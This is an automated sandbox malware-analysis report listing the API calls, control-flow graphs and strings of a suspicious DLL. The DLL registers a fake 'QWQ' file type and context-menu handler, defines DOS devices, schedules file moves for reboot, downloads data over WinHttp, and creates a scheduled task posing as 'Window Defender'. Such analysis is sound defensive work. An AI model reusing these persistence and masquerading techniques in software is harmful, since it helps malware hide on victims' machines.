                                      • lstrcmpiW.KERNEL32(?,?), ref: 6E331865
                                      • Process32NextW.KERNEL32(00000000,0000022C), ref: 6E331877
                                      • CloseHandle.KERNEL32(00000000), ref: 6E33188A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2900320273.000000006E331000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E330000, based on PE: true
                                      • Associated: 00000000.00000002.2900241726.000000006E330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2900367456.000000006E348000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2900566258.000000006E350000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2900614569.000000006E354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e330000_loaddll32.jbxd
                                      Similarity
                                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memsetlstrcmpi
                                      • String ID:
                                      • API String ID: 2129496168-0
                                      • Opcode ID: e92214fd2de9947d3d6359754bca23ef01b5806b94dd049ea2122c156384ac06
                                      • Instruction ID: 7aeb9d24cae2c213e36734ff36184f2f8ade38007f093527c5cc1b89b77f6a7c
                                      • Opcode Fuzzy Hash: e92214fd2de9947d3d6359754bca23ef01b5806b94dd049ea2122c156384ac06
                                      • Instruction Fuzzy Hash: 8C113072A11258EFDB10EFE5DC88EAEB7BCAB05748F2004E9F505D6140DB749A48CB60
                                      APIs
                                      • IsDebuggerPresent.KERNEL32 ref: 6E33CAB5
                                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6E33CACA
                                      • UnhandledExceptionFilter.KERNEL32(6E348614), ref: 6E33CAD5
                                      • GetCurrentProcess.KERNEL32(C0000409), ref: 6E33CAF1
                                      • TerminateProcess.KERNEL32(00000000), ref: 6E33CAF8
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2900320273.000000006E331000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E330000, based on PE: true
                                      • Associated: 00000000.00000002.2900241726.000000006E330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2900367456.000000006E348000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2900566258.000000006E350000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2900614569.000000006E354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e330000_loaddll32.jbxd
                                      Similarity
                                      • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                      • String ID:
                                      • API String ID: 2579439406-0
                                      • Opcode ID: b312618289375db3823a2b712d6755a9804222a6e39aad2dbc3b4d4fdf33fae1
                                      • Instruction ID: e60a561cbb3c2b4b7ca8adae4b3072e5727b97330c3d952ca719a0f58faeee6c
                                      • Opcode Fuzzy Hash: b312618289375db3823a2b712d6755a9804222a6e39aad2dbc3b4d4fdf33fae1
                                      • Instruction Fuzzy Hash: 9A21CEB9810F84DFDF41EF69C1586443BBDBB0A744F60069AE80897B50EBB15989CF86
                                      APIs
                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000010,00000000,00000000), ref: 6E3318D8
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2900320273.000000006E331000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E330000, based on PE: true
                                      • Associated: 00000000.00000002.2900241726.000000006E330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2900367456.000000006E348000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2900566258.000000006E350000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2900614569.000000006E354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e330000_loaddll32.jbxd
                                      Similarity
                                      • API ID: AdjustPrivilegesToken
                                      • String ID:
                                      • API String ID: 2874748243-0
                                      • Opcode ID: 8c085e7397c986db0fcb4286d96835a25d2599663c2e0736112ef1c616b375e0
                                      • Instruction ID: 04b434f99231d7dcaff8c611168acfd7e5899fd3b386ec2a22f78600c199f167
                                      • Opcode Fuzzy Hash: 8c085e7397c986db0fcb4286d96835a25d2599663c2e0736112ef1c616b375e0
                                      • Instruction Fuzzy Hash: FDF0ACB5A00209AFDB00DFA8C845ABFBBF9EB48308F518559E905AB341D7B0A9448B95
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2900320273.000000006E331000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E330000, based on PE: true
                                      • Associated: 00000000.00000002.2900241726.000000006E330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2900367456.000000006E348000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2900566258.000000006E350000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2900614569.000000006E354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e330000_loaddll32.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 6600750e88fa9f43d8557c139f24b9c95bf0b2ad62fb8e6dec37b67f232864d2
                                      • Instruction ID: 837a15f27b4f56905cd613dcf39e7daf50a8a4fedfff47f7719313fd43678944
                                      • Opcode Fuzzy Hash: 6600750e88fa9f43d8557c139f24b9c95bf0b2ad62fb8e6dec37b67f232864d2
                                      • Instruction Fuzzy Hash: D4521771D2026ADFCB44CF99C590AADBBF5FF09310F2081AAE855AB745D731AA50CF90
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2900320273.000000006E331000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E330000, based on PE: true
                                      • Associated: 00000000.00000002.2900241726.000000006E330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2900367456.000000006E348000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2900566258.000000006E350000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2900614569.000000006E354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e330000_loaddll32.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 4e726bfdffc2e3f6adf9b62a5ac62abb6f188ea95d93cb0f962818cf0c41d6fa
                                      • Instruction ID: 05faa607bbbdcffbfaf5fd1b2c005c2c6c19ad899f6d85251525aee5cd16db80
                                      • Opcode Fuzzy Hash: 4e726bfdffc2e3f6adf9b62a5ac62abb6f188ea95d93cb0f962818cf0c41d6fa
                                      • Instruction Fuzzy Hash: 3AF10571E142798FDB64CF68C890B9DB7B2BB89314F2181EAC84DA7241D7316E85CF91
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2900320273.000000006E331000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E330000, based on PE: true
                                      • Associated: 00000000.00000002.2900241726.000000006E330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2900367456.000000006E348000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2900566258.000000006E350000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2900614569.000000006E354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e330000_loaddll32.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                      • Instruction ID: c78c34f46419c5e9fd59893c107ea2ad8c8709c607f7d58955fe181b623237b8
                                      • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                      • Instruction Fuzzy Hash: 381108B72448F387D28089FDF8B0EB7B395EBC5325738836BD2628F65CD22399459600
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2900320273.000000006E331000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E330000, based on PE: true
                                      • Associated: 00000000.00000002.2900241726.000000006E330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2900367456.000000006E348000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2900566258.000000006E350000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2900614569.000000006E354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e330000_loaddll32.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 261125d5baa7f3b19cc3628907ebc3a1373e8379236e72980f398debc305c35f
                                      • Instruction ID: 6362b7689826744780e6cba1fc979e73f2f8e2a5160c6da721881baa718395d3
                                      • Opcode Fuzzy Hash: 261125d5baa7f3b19cc3628907ebc3a1373e8379236e72980f398debc305c35f
                                      • Instruction Fuzzy Hash: B321C622674EE287DF445AF9ECC051367D18BCA21677D8367CBA0CD081C5AED222C690

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 699 6e331144-6e33118b RegCreateKeyExA 700 6e33119f-6e3311b8 RegSetValueExA 699->700 701 6e33118d 699->701 703 6e3311ba-6e3311cb RegCloseKey 700->703 704 6e3311cd-6e3311e8 RegCreateKeyExA 700->704 702 6e331192-6e33119a call 6e33b484 701->702 711 6e331663-6e33166a 702->711 703->702 705 6e3311f1-6e3312dc call 6e33c980 RegCreateKeyExA 704->705 706 6e3311ea-6e3311ef 704->706 713 6e3312e8-6e331326 RegCloseKey SHGetSpecialFolderPathA call 6e33c980 705->713 714 6e3312de-6e3312e3 705->714 706->702 712 6e33166b call 6e33a9d1 711->712 715 6e331670-6e331671 712->715 718 6e331327-6e33132d 713->718 718->718 719 6e33132f-6e33133e 718->719 720 6e33133f-6e331345 719->720 720->720 721 6e331347-6e331355 720->721 722 6e331356-6e33135c 721->722 722->722 723 6e33135e-6e33136d 722->723 724 6e33136e-6e331374 723->724 724->724 725 6e331376-6e331385 724->725 726 6e331386-6e33138c 725->726 726->726 727 6e33138e-6e33139d 726->727 728 6e33139e-6e3313a4 727->728 728->728 729 6e3313a6-6e33149e call 6e33a9e0 call 6e33c980 RegCreateKeyExA 728->729 729->714 734 6e3314a4-6e3314c5 call 6e33a9e0 729->734 737 6e3314c8-6e3314cd 734->737 737->737 738 6e3314cf-6e3314f0 RegSetValueExA 737->738 738->703 739 6e3314f6-6e331578 call 6e33a9e0 DefineDosDeviceA call 6e33c980 call 6e33a9e0 738->739 746 6e33157a call 6e331030 739->746 747 6e33157f-6e3315c6 call 6e33c980 * 2 746->747 752 6e3315c8-6e3315d9 747->752 752->752 753 6e3315db-6e331635 call 6e33c980 * 2 752->753 758 6e331637-6e331648 753->758 758->758 759 6e33164a-6e331662 MoveFileExA 758->759 759->711
                                      APIs
                                      • RegCreateKeyExA.ADVAPI32(80000000,.qwq1,00000000,00000000,00000000,00020006,00000000,?,00000000), ref: 6E331187
                                      • _wprintf.LIBCMT ref: 6E331192
                                      • RegSetValueExA.ADVAPI32(?,00000000,00000000,00000001,QWQ,0000000A), ref: 6E3311B0
                                      • RegCloseKey.ADVAPI32(?), ref: 6E3311C0
                                      • RegCreateKeyExA.ADVAPI32(80000000,QWQ,00000000,00000000,00000000,00020006,00000000,?,00000000), ref: 6E3311E4
                                      • _memset.LIBCMT ref: 6E3312B7
                                      • RegCreateKeyExA.ADVAPI32(80000000,QWQ\ShellEx\ContextMenuHandlers\{00021401-0000-0000-C000-000000000046},00000000,00000000,00000000,00020006,00000000,?,00000000), ref: 6E3312D8
                                      • RegCloseKey.ADVAPI32(?), ref: 6E3312EE
                                      • SHGetSpecialFolderPathA.SHELL32(00000000,?,0000001A,00000000), ref: 6E3312FF
                                      • _memset.LIBCMT ref: 6E331318
                                      • _sprintf.LIBCMT ref: 6E3313C3
                                      • _memset.LIBCMT ref: 6E331471
                                      • RegCreateKeyExA.ADVAPI32(80000002,SYSTEM\CurrentControlSet\Control\Session Manager\DOS Devices,00000000,00000000,00000000,00020006,00000000,?,00000000), ref: 6E331496
                                      • _sprintf.LIBCMT ref: 6E3314B7
                                      • RegSetValueExA.ADVAPI32(?,6E34A62C,00000000,00000001,?,?), ref: 6E3314E8
                                      • _sprintf.LIBCMT ref: 6E331509
                                      • DefineDosDeviceA.KERNEL32(00000001,6E34A62C,?), ref: 6E33151B
                                      • _memset.LIBCMT ref: 6E33154C
                                      • _sprintf.LIBCMT ref: 6E331566
                                      • _memset.LIBCMT ref: 6E3315A7
                                      • _memset.LIBCMT ref: 6E3315BE
                                      • _memset.LIBCMT ref: 6E331619
                                      • _memset.LIBCMT ref: 6E33162D
                                      • MoveFileExA.KERNEL32(?,?,00000004(MOVEFILE_DELAY_UNTIL_REBOOT)), ref: 6E33165A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2900320273.000000006E331000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E330000, based on PE: true
                                      • Associated: 00000000.00000002.2900241726.000000006E330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2900367456.000000006E348000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2900566258.000000006E350000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2900614569.000000006E354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e330000_loaddll32.jbxd
                                      Similarity
                                      • API ID: _memset$Create_sprintf$CloseValue$DefineDeviceFileFolderMovePathSpecial_wprintf
                                      • String ID: %s\1.qwq1$%s\Mic$.qwq$.qwq1$1$QWQ$QWQ\ShellEx\ContextMenuHandlers\{00021401-0000-0000-C000-000000000046}$SYSTEM\CurrentControlSet\Control\Session Manager\DOS Devices$[:\1.qwq1$\??\%s$\GLOBAL??\%s$art Me$error1$error2$error3$error4$grams$nu\Pro$ows\St$rosoft\Wind
                                      • API String ID: 3934400528-3446276116
                                      • Opcode ID: 190d463cbd4f458359bc4783409868b5d8bc78200288fa81d9c3cd4b20ab95be
                                      • Instruction ID: 8f0f4d1f693288e0540c1371f453a697391946f214311cc647069b76ca935b97
                                      • Opcode Fuzzy Hash: 190d463cbd4f458359bc4783409868b5d8bc78200288fa81d9c3cd4b20ab95be
                                      • Instruction Fuzzy Hash: B2D1BDB180126DAEEB21DF948D80FEEB7BDBB05344F1045E5E549AB101EB715F898FA0

                                      Control-flow Graph

                                      APIs
                                      • _memset.LIBCMT ref: 6E33296D
                                      • _memset.LIBCMT ref: 6E33297F
                                      • _memset.LIBCMT ref: 6E33298E
                                      • WinHttpCrackUrl.WINHTTP ref: 6E332A1F
                                      • WinHttpOpen.WINHTTP(00000000,00000004,00000000,00000000,00000000), ref: 6E332A2D
                                      • WinHttpConnect.WINHTTP(00000000,?,?,00000000), ref: 6E332A5F
                                      • WinHttpOpenRequest.WINHTTP(00000000,HEAD,?,HTTP/1.1,00000000,00000000,00000100), ref: 6E332A89
                                      • WinHttpAddRequestHeaders.WINHTTP(00000000,Cache-Control: no-cachePragma: no-cache,000000FF,20000000), ref: 6E332A9A
                                      • WinHttpCloseHandle.WINHTTP(00000000), ref: 6E332AAB
                                      • WinHttpCloseHandle.WINHTTP(?), ref: 6E332AB3
                                      • WinHttpCloseHandle.WINHTTP(?), ref: 6E332ABB
                                      • WinHttpSendRequest.WINHTTP(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6E332AD5
                                      • WinHttpReceiveResponse.WINHTTP(00000000,00000000), ref: 6E332ADD
                                      • WinHttpQueryHeaders.WINHTTP(00000000,20000005,00000000,?,?,?), ref: 6E332AFF
                                      • WinHttpCloseHandle.WINHTTP(00000000), ref: 6E332B0C
                                      • WinHttpOpenRequest.WINHTTP(?,GET,?,HTTP/1.1,00000000,00000000,00000100), ref: 6E332B2B
                                      • WinHttpAddRequestHeaders.WINHTTP(00000000,Cache-Control: no-cachePragma: no-cache,000000FF,20000000), ref: 6E332B3C
                                      • WinHttpSendRequest.WINHTTP(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6E332B53
                                      • WinHttpReceiveResponse.WINHTTP(00000000,00000000), ref: 6E332B5B
                                      • _memset.LIBCMT ref: 6E332B83
                                      • WinHttpReadData.WINHTTP(00000000,?,?,?,?,00000000,80000000,?), ref: 6E332BA5
                                      • WinHttpCloseHandle.WINHTTP(00000000), ref: 6E332C03
                                      • WinHttpCloseHandle.WINHTTP(?), ref: 6E332C0B
                                      • WinHttpCloseHandle.WINHTTP(?), ref: 6E332C13
                                      • CreateFileA.KERNEL32(?,C0000000,00000001,00000000,00000004,00000001,00000000), ref: 6E332C2D
                                      • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 6E332C54
                                      • FlushFileBuffers.KERNEL32(00000005), ref: 6E332C60
                                      • CloseHandle.KERNEL32(00000005), ref: 6E332C6C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2900320273.000000006E331000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E330000, based on PE: true
                                      • Associated: 00000000.00000002.2900241726.000000006E330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2900367456.000000006E348000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2900566258.000000006E350000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2900614569.000000006E354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e330000_loaddll32.jbxd
                                      Similarity
                                      • API ID: Http$CloseHandle$Request$_memset$FileHeadersOpen$ReceiveResponseSend$BuffersConnectCrackCreateDataFlushQueryReadWrite
                                      • String ID: <$Cache-Control: no-cachePragma: no-cache$GET$HEAD$HTTP/1.1
                                      • API String ID: 2138347874-503686698
                                      • Opcode ID: 01ccda2edf9ff812ebe04de8080f98868e7cee745a08a787d4289952d8eebecb
                                      • Instruction ID: 1a19c8478708dd4f6daa0417a750f0f61bd2bf44090a40d9f475ac6c0bff6874
                                      • Opcode Fuzzy Hash: 01ccda2edf9ff812ebe04de8080f98868e7cee745a08a787d4289952d8eebecb
                                      • Instruction Fuzzy Hash: 2991D9B5800268AFDB21AF648C84DEABBFDEB09345F1485E6F508A2150DF315F85CFA4

                                      Control-flow Graph

                                      APIs
                                      • __EH_prolog3_GS.LIBCMT ref: 6E332392
                                      • CoInitializeEx.OLE32(00000000,00000000,00000420,6E3346F5,?), ref: 6E33239B
                                      • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 6E3323AD
                                      • CoCreateInstance.OLE32(6E3484F0,00000000,00000001,6E3482E0,?), ref: 6E3323C7
                                      • VariantInit.OLEAUT32(?), ref: 6E3323D4
                                      • VariantInit.OLEAUT32(?), ref: 6E3323F4
                                      • VariantInit.OLEAUT32(?), ref: 6E332411
                                      • VariantInit.OLEAUT32(?), ref: 6E33242E
                                      • VariantClear.OLEAUT32(?), ref: 6E33248D
                                      • VariantClear.OLEAUT32(?), ref: 6E332496
                                      • VariantClear.OLEAUT32(?), ref: 6E33249F
                                      • VariantClear.OLEAUT32(?), ref: 6E3324AE
                                        • Part of subcall function 6E3316CA: __EH_prolog3.LIBCMT ref: 6E3316D1
                                        • Part of subcall function 6E3316CA: SysAllocString.OLEAUT32(?), ref: 6E3316F9
                                      • _memset.LIBCMT ref: 6E33269E
                                      • _memset.LIBCMT ref: 6E3326D1
                                      • _mbstowcs.LIBCMT ref: 6E3326E9
                                      • SysAllocString.OLEAUT32(?), ref: 6E3326FE
                                      • SysAllocString.OLEAUT32(6E34A7FC), ref: 6E33277E
                                      • VariantInit.OLEAUT32(?), ref: 6E3327AE
                                      • VariantInit.OLEAUT32(?), ref: 6E3327CB
                                        • Part of subcall function 6E33172A: InterlockedDecrement.KERNEL32(?), ref: 6E331735
                                        • Part of subcall function 6E33172A: SysFreeString.OLEAUT32(00000000), ref: 6E33174A
                                      • VariantClear.OLEAUT32(?), ref: 6E332867
                                      • VariantClear.OLEAUT32(?), ref: 6E332870
                                      • VariantClear.OLEAUT32(?), ref: 6E332879
                                      • CoUninitialize.OLE32(?,?,?,?,?,?,?,00000003,?,?,?,Window Defender UqdataMicrosoft Corporation), ref: 6E33287B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2900320273.000000006E331000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E330000, based on PE: true
                                      • Associated: 00000000.00000002.2900241726.000000006E330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2900367456.000000006E348000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2900566258.000000006E350000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2900614569.000000006E354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e330000_loaddll32.jbxd
                                      Similarity
                                      • API ID: Variant$Clear$Init$String$Alloc$Initialize_memset$CreateDecrementFreeH_prolog3H_prolog3_InstanceInterlockedSecurityUninitialize_mbstowcs
                                      • String ID: PT0S$Window Defender UqdataMicrosoft Corporation$atio$n
                                      • API String ID: 1711112623-2529253536
                                      • Opcode ID: daa66922a1c111a15480ae267668f0ac4aa2f4120e3f49f4be3cb01ef18a3320
                                      • Instruction ID: a9d79fe6eaa1ec7c2ef03da98cfc534549dde51b4c5415d8a6277139bc9f9bd5
                                      • Opcode Fuzzy Hash: daa66922a1c111a15480ae267668f0ac4aa2f4120e3f49f4be3cb01ef18a3320
                                      • Instruction Fuzzy Hash: 68F126B1900669DFDB12DFA4CC84A9EB7BDAF45304F1044D5E909AB250DB71AF8ACF90

                                      Control-flow Graph

                                      APIs
                                      • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,6E33BF73,6E34D230,00000008,6E33C107,?,?,?,6E34D250,0000000C,6E33C1C2,?), ref: 6E33E868
                                      • __mtterm.LIBCMT ref: 6E33E874
                                        • Part of subcall function 6E33E53F: DecodePointer.KERNEL32(00000008,6E33C036,6E33C01C,6E34D230,00000008,6E33C107,?,?,?,6E34D250,0000000C,6E33C1C2,?), ref: 6E33E550
                                        • Part of subcall function 6E33E53F: TlsFree.KERNEL32(00000011,6E33C036,6E33C01C,6E34D230,00000008,6E33C107,?,?,?,6E34D250,0000000C,6E33C1C2,?), ref: 6E33E56A
                                        • Part of subcall function 6E33E53F: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,6E33C036,6E33C01C,6E34D230,00000008,6E33C107,?,?,?,6E34D250,0000000C,6E33C1C2,?), ref: 6E33F35F
                                        • Part of subcall function 6E33E53F: _free.LIBCMT ref: 6E33F362
                                        • Part of subcall function 6E33E53F: DeleteCriticalSection.KERNEL32(00000011,?,?,6E33C036,6E33C01C,6E34D230,00000008,6E33C107,?,?,?,6E34D250,0000000C,6E33C1C2,?), ref: 6E33F389
                                      • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 6E33E88A
                                      • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 6E33E897
                                      • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 6E33E8A4
                                      • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 6E33E8B1
                                      • TlsAlloc.KERNEL32(?,?,6E33BF73,6E34D230,00000008,6E33C107,?,?,?,6E34D250,0000000C,6E33C1C2,?), ref: 6E33E901
                                      • TlsSetValue.KERNEL32(00000000,?,?,6E33BF73,6E34D230,00000008,6E33C107,?,?,?,6E34D250,0000000C,6E33C1C2,?), ref: 6E33E91C
                                      • __init_pointers.LIBCMT ref: 6E33E926
                                      • EncodePointer.KERNEL32(?,?,6E33BF73,6E34D230,00000008,6E33C107,?,?,?,6E34D250,0000000C,6E33C1C2,?), ref: 6E33E937
                                      • EncodePointer.KERNEL32(?,?,6E33BF73,6E34D230,00000008,6E33C107,?,?,?,6E34D250,0000000C,6E33C1C2,?), ref: 6E33E944
                                      • EncodePointer.KERNEL32(?,?,6E33BF73,6E34D230,00000008,6E33C107,?,?,?,6E34D250,0000000C,6E33C1C2,?), ref: 6E33E951
                                      • EncodePointer.KERNEL32(?,?,6E33BF73,6E34D230,00000008,6E33C107,?,?,?,6E34D250,0000000C,6E33C1C2,?), ref: 6E33E95E
                                      • DecodePointer.KERNEL32(Function_0000E6C3,?,?,6E33BF73,6E34D230,00000008,6E33C107,?,?,?,6E34D250,0000000C,6E33C1C2,?), ref: 6E33E97F
                                      • __calloc_crt.LIBCMT ref: 6E33E994
                                      • DecodePointer.KERNEL32(00000000,?,?,6E33BF73,6E34D230,00000008,6E33C107,?,?,?,6E34D250,0000000C,6E33C1C2,?), ref: 6E33E9AE
                                      • GetCurrentThreadId.KERNEL32 ref: 6E33E9C0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2900320273.000000006E331000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E330000, based on PE: true
                                      • Associated: 00000000.00000002.2900241726.000000006E330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2900367456.000000006E348000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2900566258.000000006E350000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2900614569.000000006E354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e330000_loaddll32.jbxd
                                      Similarity
                                      • API ID: Pointer$AddressEncodeProc$Decode$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
                                      • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                      • API String ID: 3698121176-3819984048
                                      • Opcode ID: 99b75dbbd9728dc2f2c94fc6bdf253dfb30de930e3c42c1b035e0ea3dcae07e4
                                      • Instruction ID: 41a4669754cbcbf50a699e734d4d64a068b5b5cbe077b26d06c970fefde37e94
                                      • Opcode Fuzzy Hash: 99b75dbbd9728dc2f2c94fc6bdf253dfb30de930e3c42c1b035e0ea3dcae07e4
                                      • Instruction Fuzzy Hash: 1D313D71C45F61EEDF51AFF68804A573BBDEB46266B340D2AE85296390EB358804CF90

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 894 6e338f52-6e338f85 895 6e338f87-6e338f89 call 6e3386e9 894->895 896 6e338f8e-6e338f9a 894->896 895->896 898 6e338fa6-6e338fa9 896->898 899 6e338f9c-6e338fa1 896->899 901 6e338fab-6e338fb2 call 6e33811c 898->901 902 6e338fb8-6e338fbd 898->902 900 6e339288-6e339296 call 6e33a9d1 899->900 901->902 905 6e338fd3-6e338fee call 6e33886f 902->905 906 6e338fbf-6e338fcb call 6e338151 902->906 914 6e338ff0-6e338ff2 905->914 915 6e33901d-6e339028 905->915 913 6e338fcd 906->913 913->905 916 6e339002-6e339005 914->916 917 6e338ff4-6e338ff6 914->917 918 6e339038-6e33903a 915->918 920 6e33900f-6e339018 call 6e338e04 916->920 917->916 919 6e338ff8-6e338ffa 917->919 921 6e33902a-6e33902c 918->921 922 6e33903c-6e339053 call 6e33bafb 918->922 923 6e339007-6e33900e 919->923 924 6e338ffc-6e339000 919->924 920->900 926 6e339032 921->926 927 6e33902e-6e339030 921->927 932 6e3390f1-6e339104 922->932 933 6e339059 922->933 923->920 924->916 924->923 931 6e339035-6e339036 926->931 927->926 927->931 931->918 935 6e339106-6e33910d 932->935 936 6e339129-6e339154 call 6e33a9e0 call 6e338e04 932->936 934 6e339060-6e3390e7 call 6e33c980 * 2 call 6e33b5bd call 6e33b200 933->934 958 6e339156 934->958 959 6e3390e9-6e3390ef 934->959 935->936 939 6e33910f-6e339116 935->939 947 6e339184-6e3391aa CreateFileA 936->947 939->934 942 6e33911c-6e339123 939->942 942->934 942->936 950 6e3391b6-6e3391ca call 6e338365 947->950 951 6e3391ac-6e3391b1 947->951 956 6e3391dd 950->956 957 6e3391cc-6e3391d7 call 6e33b9a8 950->957 951->900 961 6e3391e3-6e339203 call 6e3384be 956->961 957->956 962 6e339157-6e339182 call 6e33a9e0 call 6e338e04 958->962 959->962 968 6e339299-6e3392a3 961->968 969 6e339209-6e33920b 961->969 962->947 971 6e339245-6e339253 call 6e3386e9 968->971 972 6e33923b 969->972 973 6e33920d 969->973 981 6e339276-6e339282 CloseHandle 971->981 982 6e339255-6e339270 SetFileTime 971->982 972->971 975 6e33920f-6e33922c WriteFile 973->975 976 6e33922e-6e339235 973->976 975->976 978 6e3392a5-6e3392af 975->978 976->971 979 6e339237-6e339239 976->979 978->971 979->961 979->972 981->900 982->981
                                      APIs
                                      • __fassign.LIBCMT ref: 6E339049
                                      • _memset.LIBCMT ref: 6E33907D
                                      • _memset.LIBCMT ref: 6E3390A1
                                      • _strcat_s.LIBCMT ref: 6E3390BC
